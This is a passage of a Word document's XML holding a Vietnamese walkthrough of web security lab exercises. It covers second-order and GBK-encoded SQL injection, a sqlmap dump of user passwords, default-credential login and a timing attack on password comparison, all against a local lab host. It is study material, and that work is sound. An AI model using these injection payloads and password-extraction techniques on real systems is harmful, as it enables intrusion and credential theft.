          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap </w:t>
      </w:r>
      <w:hyperlink r:id="rId115" w:history="1">
        <w:r w:rsidRPr="009F47B7">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://192.168.111.142/sqlinjection/example7/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.Tôi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> thu được toàn bộ mật khẩu của các user trên website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E323840" w14:textId="14A27B27" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="009F47B7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk59724120"/>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Công cụ sqlmap chỉ sử dụng trong mục đích kiểm thử,</w:t>
      </w:r>
      <w:r w:rsidR="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>không nên làm dụng vào các mục đích cá nhân,</w:t>
      </w:r>
      <w:r w:rsidR="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pháp luật liên can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="27A4CD23" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="785E820A" w14:textId="40E1CBD6"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75D67F62">
          <v:shape id="Hình ảnh 94" o:spid="_x0000_i1126" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId116" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAFC107"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Example 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8D0C12" w14:textId="2606BE5E"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Đây là một lần chèn SQL thứ hai, điều này có nghĩa là trang đang lọc dữ liệu đầu vào của người dùng chứ không phải dữ liệu trên Database, để thực hiện điều này, bạn sẽ cần thực hiện các bước như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07150947" w14:textId="77777777"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Tạo một user ngẫu nhiên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D118A23" w14:textId="233DB6E0" w:rsidR="004653AE" w:rsidRDefault="008228FC" w:rsidP="009F47B7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="657DB961">
          <v:shape id="Hình ảnh 95" o:spid="_x0000_i1127" type="#_x0000_t75" style="width:341.25pt;height:111.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId117" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ED3409" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6209E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tạo một user để chuẩn bị khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF21683" w14:textId="56F7FD2E"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798DFB8B">
          <v:shape id="Hình ảnh 96" o:spid="_x0000_i1128" type="#_x0000_t75" style="width:327.75pt;height:100.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId118" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04565FE2" w14:textId="421AEAF5" w:rsidR="004653AE" w:rsidRPr="009F47B7" w:rsidRDefault="004653AE" w:rsidP="009F47B7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Bằng cách sử dụng câu lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>‘or 1=1 #.</w:t>
      </w:r>
      <w:r w:rsidR="00330078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ta đã có thể truy cập vào trang web và thấy được thông tin các user hiện đang có trong website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A90EBD" w14:textId="320DCA2E" w:rsidR="004653AE" w:rsidRPr="009F47B7" w:rsidRDefault="00283404" w:rsidP="00330078">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="17C25AC0">
          <v:shape id="Hình ảnh 97" o:spid="_x0000_i1129" type="#_x0000_t75" style="width:294.75pt;height:132.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId119" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A70D86" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00330078" w:rsidRDefault="004653AE" w:rsidP="00330078">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00330078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bây giờ bạn có thể tạo người dùng khác nhau để chạy truy vấn khác nhau vào Database và lấy tất cả thông tin người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BEB59B" w14:textId="3A3E2703" w:rsidR="004653AE" w:rsidRPr="00330078" w:rsidRDefault="004653AE" w:rsidP="00330078">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00330078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 9</w:t>
      </w:r>
      <w:r w:rsidR="00482EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5649DE4A" w14:textId="56120606" w:rsidR="004653AE" w:rsidRPr="00330078" w:rsidRDefault="004653AE" w:rsidP="00330078">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00330078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ở ví dụ 9 hầu như các keyword đã bị chặn.</w:t>
      </w:r>
      <w:r w:rsidR="00330078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00330078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Trong trường hợp này nếu kết nối cho phép bạn chèn bộ ký tự từ GBK (GBK là bộ ký tự cho tiếng Trung giản thể), hàm sẽ không thoát khỏi các ký tự được chèn vì chúng hợp lệ và cơ sở dữ liệu sẽ nhận được trọng tải.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE194B2" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00330078" w:rsidRDefault="004653AE" w:rsidP="00330078">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00330078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ta thực hiện như sao:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B126C5E" w14:textId="16BE9FBF" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="00330078">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="5ED11926">
          <v:shape id="Hình ảnh 98" o:spid="_x0000_i1130" type="#_x0000_t75" style="width:468pt;height:264.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId120" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD44E28" w14:textId="0C7E00AE" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F018E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Với username: </w:t>
      </w:r>
      <w:r w:rsidRPr="00330078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Microsoft JhengHei" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>嗯</w:t>
      </w:r>
      <w:r w:rsidRPr="00330078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">'or 1=1 # </w:t>
      </w:r>
      <w:r w:rsidRPr="007F018E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">và pass: </w:t>
      </w:r>
      <w:r w:rsidRPr="00330078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Microsoft JhengHei" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>嗯</w:t>
      </w:r>
      <w:r w:rsidRPr="00330078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'or 1=1 #.</w:t>
      </w:r>
      <w:r w:rsidR="00330078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F018E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C71FAF" w14:textId="10482F7B"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098DA134">
          <v:shape id="Hình ảnh 99" o:spid="_x0000_i1131" type="#_x0000_t75" style="width:438pt;height:246pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId121" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D175D87" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00FD5E5E" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5E5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B. AUTHENTICATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346C05E5" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00482EAF" w:rsidRDefault="004653AE" w:rsidP="00482EAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00482EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Trong phần này tập hợp các ví dụ về sự cố trong các trang xác thực: từ những sự cố tầm thường đến những vấn đề phức tạp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2AF3CA" w14:textId="7D6B8111" w:rsidR="004653AE" w:rsidRPr="00482EAF" w:rsidRDefault="004653AE" w:rsidP="00482EAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00482EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 1</w:t>
      </w:r>
      <w:r w:rsidR="00482EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD75ECE" w14:textId="3C523EC0" w:rsidR="004653AE" w:rsidRPr="00482EAF" w:rsidRDefault="004653AE" w:rsidP="00482EAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00482EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ví dụ này thật đơn giản,</w:t>
      </w:r>
      <w:r w:rsidR="00482EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00482EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bản chỉ cần đọc kĩ các hướng dẫn là đã có thể hoàn thành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5CD72E" w14:textId="6BC1E474" w:rsidR="004653AE" w:rsidRPr="00482EAF" w:rsidRDefault="004653AE" w:rsidP="00482EAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00482EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ta chỉ cần nhập tên đăng nhập: admin và mật khẩu:</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00482EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin là đã có thể đăng nhập thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B7F175" w14:textId="3ED88DAE" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="56D2C7E8">
          <v:shape id="Hình ảnh 100" o:spid="_x0000_i1132" type="#_x0000_t75" style="width:420pt;height:107.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId122" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B6BEA3" w14:textId="441610E2"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Trường hợp này kẻ tấn công đoán password của bạn.</w:t>
      </w:r>
      <w:r w:rsidR="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5433B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vì vậy không nên đặt mật khẩu quá đơn giản hay những từ thông dụng tránh bị đánh cấp mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BC68B4" w14:textId="5B20BF6E" w:rsidR="004653AE" w:rsidRDefault="008228FC" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1B6DB761">
          <v:shape id="Hình ảnh 102" o:spid="_x0000_i1133" type="#_x0000_t75" style="width:345pt;height:77.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId123" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2109940A" w14:textId="2354336C"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Example 2</w:t>
      </w:r>
      <w:r w:rsidR="0094114D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07810486" w14:textId="77777777"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Trong tình huống này, Dev đã tạo ra lỗ hổng so sánh chuỗi không theo thời gian liên tục, điều này có nghĩa là trang web sẽ phân tích chuỗi được nhập, từng ký tự cho đến khi phát hiện ra lỗi, vì Dev</w:t>
      </w:r>
      <w:r w:rsidRPr="00F86CDC">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5433B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>không bận tâm đến việc đưa vào loại mã để ngẫu nhiên hóa hoặc chuẩn hóa thời gian cần trang để phân tích dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9747B1" w14:textId="77777777"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 xml:space="preserve"> Nếu tôi đăng ký thời gian để một ký tự nhất định được phân tích, tôi có thể xem nó đúng hay sai (bên phải sẽ mất nhiều thời gian hơn để truy xuất lỗi vì nó sẽ chuyển sang ký tự tiếp theo trước khi tìm ra lỗi).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A64849" w14:textId="77777777"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Do đó để khai thác điều này, tôi ttạo một tập lệnh xuất ra khoảng thời gian từ khi kiểm tra biểu mẩu đến khi thông báo lỗi xuất hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07300372" w14:textId="525B9E31" w:rsidR="004653AE" w:rsidRPr="00C5433B" w:rsidRDefault="004653AE" w:rsidP="00C5433B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5433B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sử dụng đoạn script trên chạy trên nền tảng Power shell tôi nhân được mật khẩu là:</w:t>
      </w:r>
      <w:r w:rsidR="00C5433B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5433B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p4ssw0rd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5800E7AE" w14:textId="213A47AB" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="00DD0EB2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="37F04AB7">
          <v:shape id="Hình ảnh 103" o:spid="_x0000_i1134" type="#_x0000_t75" style="width:403.5pt;height:234pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId124" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C4F20D" w14:textId="08661AD9" w:rsidR="004653AE" w:rsidRPr="00DD0EB2" w:rsidRDefault="004653AE" w:rsidP="00DD0EB2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Để sử dụng đoạn script này,</w:t>
      </w:r>
      <w:r w:rsidR="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ta cần cài đặt nền tảng python trước tiên.</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Như ở trên tôi đã cài đặt </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python,vì</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vậy bây giờ ta chỉ cần xài lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
